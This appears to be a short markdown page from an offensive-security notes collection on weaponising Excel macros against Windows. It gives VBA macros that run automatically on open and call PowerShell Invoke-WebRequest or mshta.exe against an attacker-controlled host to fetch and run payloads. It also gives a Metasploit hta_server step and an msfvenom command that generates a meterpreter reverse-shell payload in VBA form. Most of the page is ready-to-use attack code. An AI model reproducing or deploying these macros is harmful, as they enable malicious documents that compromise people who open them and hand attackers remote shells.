killchain-compendium/exploit/windows/macros/macros.md

743 B

Macros

  • Executes after user clicks enable content

  • Open Excel

  • View --> Macros --> Create New Macros

Sub HelloWorld()
    PID = Shell("powershell.exe -c Invoke-WebRequest -Uri https://%ATTACKER_IP%/passwd -OutFile C:\passwd", vbNormalFocus)
End Sub

Sub Auto_Open()
    HelloWorld
End Sub

Meterpreter

  • Directly execute shell without user interaction
  • Configure and run use windows/misc/hta_server
  • Macro executes mshta.exe
Sub HelloWorld()
    PID = Shell("mshta.exe https://%ATTACKER_IP%:8080/c9496fz.hta")
End Sub

Sub Auto_Open()
    HelloWorld
End Sub

Msfvenom

  • Create reverse shell via
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=443 -f vba -o surprise.vba